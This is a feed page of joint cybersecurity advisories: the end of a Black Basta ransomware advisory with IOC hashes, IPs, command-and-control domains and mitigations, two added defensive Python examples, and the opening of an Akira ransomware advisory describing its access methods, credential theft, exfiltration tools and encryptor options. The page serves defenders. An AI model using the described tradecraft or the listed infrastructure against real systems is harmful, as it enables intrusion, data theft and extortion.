0554eb2ffa3582b000d558b6950ec60e876f1259c41acff2eac47ab78a53e94a | EXE
9a55f55886285eef7ffabdd55c0232d1458175b1d868c03d3e304ce7d98980bc | EXE
62e63388953bb30669b403867a3ac2c8130332cf78133f7fd4a7f23cdc939087 | EXE
7ad4324ea241782ea859af12094f89f9a182236542627e95b6416c8fb9757c59 | EXE
350ba7fca67721c74385faff083914ecdd66ef107a765dfb7ac08b38d5c9c0bd | EXE
90ba27750a04d1308115fa6a90f36503398a8f528c974c5adc07ae8a6cd630e7 | EXE
fafaff3d665b26b5c057e64b4238980589deb0dff0501497ac50be1bc91b3e08 | EXE
acb60f0dd19a9a26aaaefd3326db8c28f546b6b0182ed2dcc23170bcb0af6d8f | EXE
d73f6e240766ddd6c3c16eff8db50794ab8ab95c6a616d4ab2bc96780f13464d | EXE
f039eaaced72618eaba699d2985f9e10d252ac5fe85d609c217b45bc8c3614f4 | EXE
723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224 | EXE
ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6e | EXE
fff35c2da67eef6f1a10c585b427ac32e7f06f4e4460542207abcd62264e435f | EXE
df5b004be71717362e6b1ad22072f9ee4113b95b5d78c496a90857977a9fb415 | EXE
462bbb8fd7be98129aa73efa91e2d88fa9cafc7b47431b8227d1957f5d0c8ba7 | EXE
3c50f6369f0938f42d47db29a1f398e754acb2a8d96fd4b366246ac2ccbe250a | EXE
5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa | EXE
37a5cd265f7f555f2fe320a68d70553b7aa9601981212921d1ac2c114e662004 | EXE
3090a37e591554d7406107df87b3dc21bda059df0bc66244e8abef6a5678af35 | EXE
17879ed48c2a2e324d4f5175112f51b75f4a8ab100b8833c82e6ddb7cd817f20 | EXE
42f05f5d4a2617b7ae0bc601dd6c053bf974f9a337a8fcc51f9338b108811b78 | EXE
882019d1024778e13841db975d5e60aaae1482fcf86ba669e819a68ce980d7d3 | EXE
e28188e516db1bda9015c30de59a2e91996b67c2e2b44989a6b0f562577fd757 | EXE
0a8297b274aeab986d6336b395b39b3af1bb00464cf5735d1ecdb506fef9098e | EXE
69192821f8ce4561cf9c9cb494a133584179116cb2e7409bea3e18901a1ca944 | EXE
3337a7a9ccdd06acdd6e3cf4af40d871172d0a0e96fc48787b574ac93689622a | EXE
17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90 | EXE
b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9 | EXE

See Tables 8–11 for IOCs obtained from trusted third-party reporting.

Disclaimer: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking, as many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains.
Table 8: Network Indicators

IP Address | Description
66.249.66[.]18 | 0gpw.588027fa.dns.realbumblebee[.]net, dns.trailshop[.]net, dns.artspathgroupe[.]net
66.249.66[.]18 | my.2a91c002002.588027fa.dns.realbumblebee[.]net
66.249.66[.]18 | fy9.39d9030e5d3a8e2352daae2f4cd3c417b36f64c6644a783b9629147a1.afd8b8a4615358e0313bad8c544a1af0d8efcec0e8056c2c8eee96c7.b06d1825c0247387e38851b06be0272b0bd619b7c9636bc17b09aa70.a46890f27.588027fa.dns.realbumblebee[.]net
95.181.173[.]227 | adslsdfdsfmo[.]world
(blank in source) | fy9.36c44903529fa273afff3c9b7ef323432e223d22ae1d625c4a3957d57.015c16eff32356bf566c4fd3590c6ff9b2f6e8c587444ecbfc4bcae7.f71995aff9e6f22f8daffe9d2ad9050abc928b8f93bb0d42682fd3c3.445de2118.588027fa.dns.realbumblebee[.]net
207.126.152[.]242 | xkpal.d6597fa.dns.blocktoday[.]net; nuher.3577125d2a75f6a277fc5714ff536c5c6af5283d928a66daad6825b9a.7aaf8bba88534e88ec89251c57b01b322c7f52c7f1a5338930ae2a50.cbb47411f60fe58f76cf79d300c03bdecfb9e83379f59d80b8494951.e10c20f77.7fcc0eb6.dns.blocktoday[.]net
72.14.196[.]50 | .rasapool[.]net, dns.trailshop[.]net
72.14.196[.]192 | .rasapool[.]net
72.14.196[.]2 | .rasapool[.]net
72.14.196[.]226 | .rasapool[.]net
46.161.27[.]151 |
207.126.152[.]242 | nuher.1d67bbcf4.456d87aa6.2d84dfba.dns.specialdrills[.]com
185.219.221[.]136 |
64.176.219[.]106 |
5.78.115[.]67 | your-server[.]de
207.126.152[.]242 | xkpal.1a4a64b6.dns.blocktoday[.]net
46.8.16[.]77 |
185.7.214[.]79 | VPN Server
185.220.100[.]240 | Tor exit
107.189.30[.]69 | Tor exit
5.183.130[.]92 |
185.220.101[.]149 | Tor exit
188.130.218[.]39 |
188.130.137[.]181 |
46.8.10[.]134 |
155.138.246[.]122 |
80.239.207[.]200 | winklen[.]ch
183.181.86[.]147 | Xserver[.]jp
34.149.120[.]3 |
104.21.40[.]72 |
34.250.161[.]149 |
88.198.198[.]90 | your-server[.]de; literoved[.]ru
35.244.153[.]44 |
35.212.86[.]55 |
34.251.163[.]236 |
34.160.81[.]203 |
34.149.36[.]179 |
104.21.26[.]145 |
83.243.40[.]10 |
35.227.194[.]51 |
35.190.31[.]54 |
34.120.190[.]48 |
116.203.186[.]178 |
34.160.17[.]71 |

Table 9: File Indicators

Filename | Hash
C:\Users\Public\Audio\Jun.exe | b6a4f4097367d9c124f51154d8750ea036a812d5badde0baf9c5f183bb53dd24
C:\Users\Public\Audio\esx.zip |
C:\Users\Public\Audio\7zG.exe | f21240e0bf9f0a391d514e34d4fa24ecb997d939379d2260ebce7c693e55f061
C:\Users\Public\Audio\7z.dll |
C:\Users\Public\db_Usr.sql | 8501e14ee6ee142122746333b936c9ab0fc541328f37b5612b6804e6cdc2c2c6
C:\Users\Public\Audio\db_Usr.sql |
C:\Users\Public\Audio\hv2.ps1 |
C:\Users\Public\7zG.exe |
C:\Users\Public\7z.dll |
C:\Users\Public\BitLogic.dll |
C:\Users\Public\NetApp.exe | 4c897334e6391e7a2fa3cbcbf773d5a4
C:\Users\Public\DataSoft.exe | 2642ec377c0cee3235571832cb472870
C:\Users\Public\BitData.exe | b3fe23dd4701ed00d79c03043b0b952e
C:\Users\Public\DigitalText.dll |
C:\Users\Public\GeniusMesh.exe |
\Device\Mup\{redacted}\C$\Users\Public\Music\PROCEXP.sys |
\Device\Mup\{redacted}\C$\Users\Public\Music\DumpNParse86.exe |
\Device\Mup\{redacted}\C$\Users\Public\Music\POSTDump.exe |
\Device\Mup\{redacted}\C$\Users\Public\Music\DumpNParse.exe |
C:\Users\Public\socksps.ps1 |
C:\Users\Public\Thief.exe | 034b5fe047920b2ae9493451623633b14a85176f5eea0c7aadc110ea1730ee79
C:\Users\All Users\{redacted}\GWT.ps1; C:\Program Files\MonitorIT\GWT.ps1 | 8C68B2A794BA3D148CAE91BDF9C8D357289752A94118B5558418A36D95A5A45F
Winx86.exe (alias for cmd.exe) |
C:\Users\Public\eucr.exe | 3c65da7f7bfdaf9acc6445abbedd9c4e927d37bb9e3629f34afc338058680407
C:\Windows\DS_c1.dll | 808c96cb90b7de7792a827c6946ff48123802959635a23bf9d98478ae6a259f9
C:\Windows\DS_c1.dll | 3a8fc07cadc08eeb8be342452636a754158403c3d4ebff379a4ae66f8298d9a6
C:\Windows\DS_c1.dll | 4ac69411ed124da06ad66ee8bfbcea2f593b5b199a2c38496e1ee24f9d04f34a
C:\Windows\DS_c1.dll | 819cb9bcf62be7666db5666a693524070b0df589c58309b067191b30480b0c3a
C:\Windows\DS_c1.dll | c26a5cb62a78c467cc6b6867c7093fbb7b1a96d92121d4d6c3f0557ef9c881e0
C:\Windows\DS_c1.dll | d503090431fdd99c9df3451d9b73c5737c79eda6eb80c148b8dc71e84623401f
*\instructions_read_me.txt |

Table 10: Known Black Basta Cobalt Strike Domains

Domain | Date/Time (UTC)
trailshop[.]net | 5/8/2024 6:37
realbumblebee[.]net | 5/8/2024 6:37
recentbee[.]net | 5/8/2024 6:37
investrealtydom[.]net | 5/8/2024 6:37
webnubee[.]com | 5/8/2024 6:37
artspathgroup[.]net | 5/8/2024 6:37
buyblocknow[.]com | 5/8/2024 6:37
currentbee[.]net | 5/8/2024 6:37
modernbeem[.]net | 5/8/2024 6:37
startupbusiness24[.]net | 5/8/2024 6:37
magentoengineers[.]com | 5/8/2024 6:37
childrensdolls[.]com | 5/8/2024 6:37
myfinancialexperts[.]com | 5/8/2024 6:37
limitedtoday[.]com | 5/8/2024 6:37
kekeoamigo[.]com | 5/8/2024 6:37
nebraska-lawyers[.]com | 5/8/2024 6:37
tomlawcenter[.]com | 5/8/2024 6:37
thesmartcloudusa[.]com | 5/8/2024 6:37
rasapool[.]net | 5/8/2024 6:37
artspathgroupe[.]net | 5/8/2024 6:37
specialdrills[.]com | 5/8/2024 6:37
thetrailbig[.]net | 5/8/2024 6:37
consulheartinc[.]com | 3/22/2024 15:35
otxcosmeticscare[.]com | 3/15/2024 10:14
otxcarecosmetics[.]com | 3/15/2024 10:14
artstrailman[.]com | 3/15/2024 10:14
ontexcare[.]com | 3/15/2024 10:14
trackgroup[.]net | 3/15/2024 10:14
businessprofessionalllc[.]com | 3/15/2024 10:14
securecloudmanage[.]com | 3/7/2024 10:42
oneblackwood[.]com | 3/7/2024 10:42
buygreenstudio[.]com | 3/7/2024 10:42
startupbuss[.]com | 3/7/2024 10:42
onedogsclub[.]com | 3/4/2024 18:26
wipresolutions[.]com | 3/4/2024 18:26
recentbeelive[.]com | 3/4/2024 18:26
trailcocompany[.]com | 3/4/2024 18:26
trailcosolutions[.]com | 3/4/2024 18:26
artstrailreviews[.]com | 3/4/2024 18:26
usaglobalnews[.]com | 2/15/2024 5:56
topglobaltv[.]com | 2/15/2024 5:56
startupmartec[.]net | 2/15/2024 5:56
technologgies[.]com | 1/2/2024 18:16
jenshol[.]com | 1/2/2024 18:16
simorten[.]com | 1/2/2024 18:16
investmentgblog[.]net | 1/2/2024 18:16
protectionek[.]com | 1/2/2024 18:16

Table 11: Suspected Black Basta Domains

airbusco[.]net
allcompanycenter[.]com
animalsfast[.]net
audsystemecll[.]net
auuditoe[.]com
bluenetworking[.]net
brendonline[.]com
businesforhome[.]com
caspercan[.]com
clearsystemwo[.]net
cloudworldst[.]net
constrtionfirst[.]com
erihudeg[.]com
garbagemoval[.]com
gartenlofti[.]com
getfnewsolutions[.]com
getfnewssolutions[.]com
investmendvisor[.]net
investmentrealtyhp[.]net
ionoslaba[.]com
jessvisser[.]com
karmafisker[.]com
kolinileas[.]com
maluisepaul[.]com
masterunix[.]net
monitor-websystem[.]net
monitorsystem[.]net
mytrailinvest[.]net
prettyanimals[.]net
reelsysmoona[.]net
seohomee[.]com
septcntr[.]com
softradar[.]net
startupbizaud[.]net
startuptechnologyw[.]net
steamteamdev[.]net
stockinvestlab[.]net
taskthebox[.]net
trailgroupl[.]net
treeauwin[.]net
unitedfrom[.]com
unougn[.]com
wardeli[.]com
welausystem[.]net
wellsystemte[.]net
withclier[.]com

MITIGATIONS

The authoring organizations recommend all critical infrastructure organizations implement the mitigations below to improve your organization's cybersecurity posture based on Black Basta's activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

- Install updates for operating systems, software, and firmware as soon as they are released [CPG 1.E]. Prioritize updating Known Exploited Vulnerabilities (KEV).
- Require phishing-resistant multi-factor authentication (MFA) [CPG 2.H] for as many services as possible.
- Implement recommendations, including training users to recognize and report phishing attempts [CPG 2.I], from joint Phishing Guidance: Stopping the Attack Cycle at Phase One.
- Secure remote access software by applying mitigations from joint Guide to Securing Remote Access Software.
- Make backups of critical systems and device configurations [CPG 2.R] to enable devices to be repaired and restored.
- Apply mitigations from the joint #StopRansomware Guide.

The authoring organizations also recommend network defenders of HPH Sector and other critical infrastructure organizations to reference CISA's Mitigation Guide: Healthcare and Public Health (HPH) Sector and HHS's HPH Cybersecurity Performance Goals, which provide best practices to combat pervasive cyber threats against organizations. Recommendations include the following:

Asset Management and Security: Cybersecurity professionals should identify and understand all relationships or interdependencies, functionality of each asset, what it exposes, and what software is running to ensure critical data and systems are protected appropriately. HPH Sector organizations should ensure electronic PHI (ePHI) is protected and compliant with the Health Insurance Portability and Accountability Act (HIPAA). Organizations can complete asset inventories using active scans, passive processes, or a combination of both techniques.

Email Security and Phishing Prevention: Organizations should install modern anti-malware software and automatically update signatures where possible. For additional guidance, see CISA's Enhance Email and Web Security Guide.
- Check for embedded or spoofed hyperlinks: Validate the URL of the link matches the text of the link itself. This can be achieved by hovering your cursor over the link to view the URL of the website to be accessed.

Access Management: Phishing-resistant MFA completes the same process but removes 'people' from the equation to help thwart social engineering scams and targeted phishing attacks that may have been successful using traditional MFA. The two main forms of phishing-resistant MFA are FIDO/Web Authentication (WebAuthn) authentication and Public Key Infrastructure (PKI)-based authentication. Prioritize phishing-resistant MFA on accounts with the highest risk, such as privileged administrative accounts on key assets. For additional information on phishing-resistant MFA, see CISA's Implementing Phishing-Resistant MFA Guide.

Vulnerability Management and Assessment: Once vulnerabilities are identified across your environment, evaluate and prioritize to appropriately deal with the posed risks according to your organization's risk strategy. To assist with prioritization, it is essential to:
- Map your assets to business-critical functions. For vulnerability remediation, prioritize assets that are most critical for ongoing operations or which, if affected, could impact your organization's business continuity, sensitive PII (or PHI) security, reputation, or financial position.
- Use threat intelligence information. For remediation, prioritize vulnerabilities actively exploited by threat actors. To assist, leverage CISA's KEV Catalog and other threat intelligence feeds.
- Leverage prioritization methodologies, ratings, and scores. The Common Vulnerability Scoring System (CVSS) assesses the technical severity of vulnerabilities. The Exploit Prediction Scoring System (EPSS) measures the likelihood of exploitation and can help with deciding which vulnerabilities to prioritize. CISA's Stakeholder-Specific Vulnerability Categorization (SSVC) methodology leverages decision trees to prioritize relevant vulnerabilities into four decisions, Track, Track*, Attend, and Act, based on exploitation status, technical impact, mission prevalence, and impacts to safety and public well-being.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
1. Select an ATT&CK technique described in this advisory (see Tables 2-6).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies' performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REFERENCES

- SentinelOne: Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor
- Trend Micro: Ransomware Spotlight – Black Basta
- Kroll: Black Basta – Technical Analysis
- Who Is Black Basta? (blackberry.com)
- Palo Alto Networks: Threat Assessment – Black Basta Ransomware

REPORTING

Your organization has no obligation to respond or provide information back to FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.

FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.

FBI, CISA, and HHS do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to FBI's Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency's Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or by calling 1-844-Say-CISA [1-844-729-2472]).

DISCLAIMER

The information in this report is being provided "as is" for informational purposes only. FBI, CISA, HHS, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, HHS, and MS-ISAC.

VERSION HISTORY

May 10, 2024: Initial version.
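The Vulnerability Management and Assessment recommendations above combine three inputs (KEV membership, EPSS likelihood, CVSS severity) with asset criticality and name the four SSVC decisions. The following is an added example, not part of the advisory and not CISA's published SSVC decision tree: a simplified ranking that reuses the four decision names so a defender can see how those inputs interact when ordering a patch queue. The CVE identifiers, scores and asset flags in the sample list are constructed placeholders.

```python
from dataclasses import dataclass

# Decision tiers, ordered from most to least urgent. The names follow the
# four SSVC decisions the advisory mentions, but the rules below are a
# simplified illustration written for this example, not CISA's SSVC tree.
TIERS = ("Act", "Attend", "Track*", "Track")


@dataclass(frozen=True)
class Finding:
    cve: str              # identifier (placeholders below, not real CVEs)
    cvss: float           # CVSS base score, 0.0-10.0 (technical severity)
    epss: float           # EPSS probability of exploitation, 0.0-1.0
    in_kev: bool          # listed in CISA's Known Exploited Vulnerabilities Catalog
    critical_asset: bool  # host is mapped to a business-critical function


def classify(f: Finding) -> str:
    """Map one finding to a tier from exploitation status and asset criticality."""
    if f.in_kev and f.critical_asset:
        return "Act"        # known exploited, on a system that matters most
    if f.in_kev or (f.epss >= 0.5 and f.critical_asset):
        return "Attend"     # known exploited elsewhere, or likely to be soon
    if f.epss >= 0.1 or f.cvss >= 9.0:
        return "Track*"     # elevated likelihood or severity; watch closely
    return "Track"


def prioritize(findings):
    """Order findings for remediation: tier first, then EPSS, then CVSS, then id."""
    return sorted(
        findings,
        key=lambda f: (TIERS.index(classify(f)), -f.epss, -f.cvss, f.cve),
    )


def tier_summary(findings):
    """Group CVE identifiers by tier, keeping remediation order within each tier."""
    summary = {tier: [] for tier in TIERS}
    for f in prioritize(findings):
        summary[classify(f)].append(f.cve)
    return summary


# Constructed sample findings: placeholder identifiers and made-up scores.
SAMPLE_FINDINGS = [
    Finding("CVE-0000-0001", cvss=9.8, epss=0.97, in_kev=True, critical_asset=True),
    Finding("CVE-0000-0002", cvss=7.5, epss=0.92, in_kev=True, critical_asset=False),
    Finding("CVE-0000-0003", cvss=8.8, epss=0.65, in_kev=False, critical_asset=True),
    Finding("CVE-0000-0004", cvss=9.1, epss=0.02, in_kev=False, critical_asset=False),
    Finding("CVE-0000-0005", cvss=5.3, epss=0.01, in_kev=False, critical_asset=True),
]

if __name__ == "__main__":
    for f in prioritize(SAMPLE_FINDINGS):
        print(f"{classify(f):7} {f.cve}  cvss={f.cvss}  epss={f.epss:.2f}  kev={f.in_kev}")
```

Note how CVE-0000-0004 ranks below two lower-CVSS items: a 9.1 base score with negligible EPSS and no KEV entry is tracked, while a 7.5 that is actively exploited is attended to first, which is the ordering the advisory's "prioritize vulnerabilities actively exploited by threat actors" guidance asks for.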
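The Email Security recommendation above tells users to check that a link's visible text matches its real target. The same check can be automated at the mail gateway or in a triage script; the following is an added example (not from the advisory) that parses an HTML message body with Python's standard library and flags anchors whose displayed host differs from the href host. The sample message and all domains in it (reserved .test TLD) are constructed, and the "last two labels" domain comparison is a deliberate simplification.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Visible anchor text that looks like a web address: optional scheme,
# optional "www.", then a dotted host. Plain text such as "Click here" is skipped.
URL_LIKE_TEXT = re.compile(r"^(?:https?://)?(?:www\.)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Naive comparison key: the last two DNS labels (simplification for this example)."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def find_mismatched_links(html):
    """Return (visible_text, href) pairs whose displayed host differs from the real target."""
    parser = _AnchorCollector()
    parser.feed(html)
    flagged = []
    for href, text in parser.links:
        match = URL_LIKE_TEXT.match(text)
        if not match:
            continue                      # text is not URL-like; nothing to compare
        shown_host = match.group(1)
        real_host = urlparse(href).hostname or ""
        if registrable_domain(shown_host) != registrable_domain(real_host):
            flagged.append((text, href))
    return flagged


# Constructed sample message body for this example; not a real phishing email.
SAMPLE_EMAIL_HTML = """
<p>Your mailbox is almost full. Sign in at
<a href="https://login.example-attacker.test/owa">https://portal.example-hospital.test</a>
to free up space, or read the policy at
<a href="https://www.example-hospital.test/help/quota">www.example-hospital.test/help/quota</a>.
<a href="https://tracker.example-attacker.test/c?id=1">Click here</a> to unsubscribe.</p>
"""

if __name__ == "__main__":
    for shown, target in find_mismatched_links(SAMPLE_EMAIL_HTML):
        print(f"MISMATCH: text shows {shown!r} but link goes to {target!r}")
```

Only the first anchor is reported: its text claims one domain while the href points at another, which is exactly what a hover check would reveal. The second anchor agrees with its target and the third ("Click here") has no displayed host to compare, so it is left for other controls such as URL reputation.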

  • #StopRansomware: Akira Ransomware
    by CISA (CISA Cybersecurity Advisories) on 17 Aprile 2024 at 4:23 pm

    SUMMARY

    Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

    The United States' Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Europol's European Cybercrime Centre (EC3), and the Netherlands' National Cyber Security Centre (NCSC-NL) are releasing this joint CSA to disseminate known Akira ransomware IOCs and TTPs identified through FBI investigations and trusted third party reporting as recently as February 2024.

    Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines. As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds.

    Early versions of the Akira ransomware variant were written in C++ and encrypted files with a .akira extension; however, beginning in August 2023, some Akira attacks began deploying Megazord, using Rust-based code which encrypts files with a .powerranges extension. Akira threat actors have continued to use both Megazord and Akira, including Akira_v2 (identified by trusted third party investigations), interchangeably.
    The FBI, CISA, EC3, and NCSC-NL encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

    Download the PDF version of this report:
    - AA24-109A #StopRansomware: Akira Ransomware (PDF, 591.05 KB)

    For a downloadable copy of IOCs, see:
    - AA24-109A STIX XML (XML, 114.01 KB)
    - AA24-109A STIX JSON (JSON, 67.80 KB)

    TECHNICAL DETAILS

    Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

    Initial Access

    The FBI and cybersecurity researchers have observed Akira threat actors obtaining initial access to organizations through a virtual private network (VPN) service without multifactor authentication (MFA) configured [1], mostly using known Cisco vulnerabilities [T1190] CVE-2020-3259 and CVE-2023-20269.[2],[3],[4] Additional methods of initial access include the use of external-facing services such as Remote Desktop Protocol (RDP) [T1133], spear phishing [T1566.001][T1566.002], and the abuse of valid credentials [T1078].[4]

    Persistence and Discovery

    Once initial access is obtained, Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts [T1136.002] to establish persistence. In some instances, the FBI identified Akira threat actors creating an administrative account named itadm.

    According to FBI and open source reporting, Akira threat actors leverage post-exploitation attack techniques, such as Kerberoasting [5], to extract credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS) [T1003.001].[6] Akira threat actors also use credential scraping tools [T1003] like Mimikatz and LaZagne to aid in privilege escalation. Tools like SoftPerfect and Advanced IP Scanner are often used for network device discovery (reconnaissance) purposes [T1016] and net Windows commands are used to identify domain controllers [T1018] and gather information on domain trust relationships [T1482]. See Table 1 for a descriptive listing of these tools.

    Defense Evasion

    Based on trusted third party investigations, Akira threat actors have been observed deploying two distinct ransomware variants against different system architectures within the same compromise event. This marks a shift from recently reported Akira ransomware activity. Akira threat actors were first observed deploying the Windows-specific "Megazord" ransomware, with further analysis revealing that a second payload was concurrently deployed in this attack (which was later identified as a novel variant of the Akira ESXi encryptor, "Akira_v2").

    As Akira threat actors prepare for lateral movement, they commonly disable security software to avoid detection. Cybersecurity researchers have observed Akira threat actors using PowerTool to exploit the Zemana AntiMalware driver [4] and terminate antivirus-related processes [T1562.001].

    Exfiltration and Impact

    Akira threat actors leverage tools such as FileZilla, WinRAR [T1560.001], WinSCP, and RClone to exfiltrate data [T1048]. To establish command and control channels, threat actors leverage readily available tools like AnyDesk, MobaXterm, RustDesk, Ngrok, and Cloudflare Tunnel, enabling exfiltration through various protocols such as File Transfer Protocol (FTP), Secure File Transfer Protocol (SFTP), and cloud storage services like Mega [T1537] to connect to exfiltration servers.

    Akira threat actors use a double-extortion model [T1657] and encrypt systems [T1486] after exfiltrating data. The Akira ransom note provides each company with a unique code and instructions to contact the threat actors via a .onion URL.
    Akira threat actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. Ransom payments are paid in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. To further apply pressure, Akira threat actors threaten to publish exfiltrated data on the Tor network, and in some instances have called victimized companies, according to FBI reporting.

    Encryption

    Akira threat actors utilize a sophisticated hybrid encryption scheme to lock data. This involves combining a ChaCha20 stream cipher with an RSA public-key cryptosystem for speed and secure key exchange [T1486]. This multilayered approach tailors encryption methods based on file type and size and is capable of full or partial encryption. Encrypted files are appended with either a .akira or .powerranges extension. To further inhibit system recovery, Akira's encryptor (w.exe) utilizes PowerShell commands to delete volume shadow copies (VSS) on Windows systems [T1490]. Additionally, a ransom note named fn.txt appears in both the root directory (C:) and each user's home directory (C:\Users).

    Trusted third party analysis identified that the Akira_v2 encryptor is an upgrade from its previous version, which includes additional functionalities due to the language it's written in (Rust). Previous versions of the encryptor provided options to insert arguments at runtime, including:
    - -p --encryption_path (targeted file/folder paths)
    - -s --share_file (targeted network drive path)
    - -n --encryption_percent (percentage of encryption)
    - --fork (create a child process for encryption)

    The ability to insert additional threads allows Akira threat actors to have more granular control over the number of CPU cores in use, increasing the speed and efficiency of the encryption process. The new version also adds a layer of protection, utilizing the Build ID as a run condition to hinder dynamic analysis.
    The encryptor is unable to execute successfully without the unique Build ID. The ability to deploy against only virtual machines using "vmonly" and the ability to stop running virtual machines with "stopvm" functionalities have also been observed implemented for Akira_v2. After encryption, the Linux ESXi variant may include the file extension "akiranew" or add a ransom note named "akiranew.txt" in directories where files were encrypted with the new nomenclature.

    Leveraged Tools

    Table 1 lists publicly available tools and applications Akira threat actors have used, including legitimate tools repurposed for their operations. Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

    Table 1: Tools Leveraged by Akira Ransomware Actors

    Name | Description
    AdFind | AdFind.exe is used to query and retrieve information from Active Directory.
    Advanced IP Scanner | A network scanner is used to locate all the computers on a network and conduct a scan of their ports. The program shows all network devices, gives access to shared folders, and provides remote control of computers (via RDP and Radmin).
    AnyDesk | A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer.
    LaZagne | Allows users to recover stored passwords on Windows, Linux, and OSX systems.
    PCHunter64 | A tool used to acquire detailed process and system information [T1082].[7]
    PowerShell | A cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
    Mimikatz | Allows users to view and save authentication credentials such as Kerberos tickets.
    Ngrok | A reverse proxy tool [T1090] used to create a secure tunnel to servers behind firewalls or local machines without a public IP address.
    RClone | A command line program used to sync files with cloud storage services [T1567.002] such as Mega.
    SoftPerfect | A network scanner (netscan.exe) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It also scans for remote services, registry, files, and performance counters.
    WinRAR | Used to split compromised data into segments and to compress [T1560.001] files into .RAR format for exfiltration.
    WinSCP | Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Akira threat actors have used it to transfer data [T1048] from a compromised network to actor-controlled accounts.

    Indicators of Compromise

    Disclaimer: Investigation or vetting of these indicators is recommended prior to taking action, such as blocking.

    Table 2a: Malicious Files Affiliated with Akira Ransomware

    File Name | Hash (SHA-256) | Description
    w.exe | d2fd0654710c27dcf37b6c1437880020824e161dd0bf28e3a133ed777242a0ca | Akira ransomware
    Win.exe | dcfa2800754e5722acf94987bb03e814edcb9acebda37df6da1987bf48e5b05e | Akira ransomware encryptor
    AnyDesk.exe | bc747e3bf7b6e02c09f3d18bdd0e64eef62b940b2f16c9c72e647eec85cf0138 | Remote desktop application
    Gcapi.dll | 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf | DLL file that assists with the execution of AnyDesk.exe
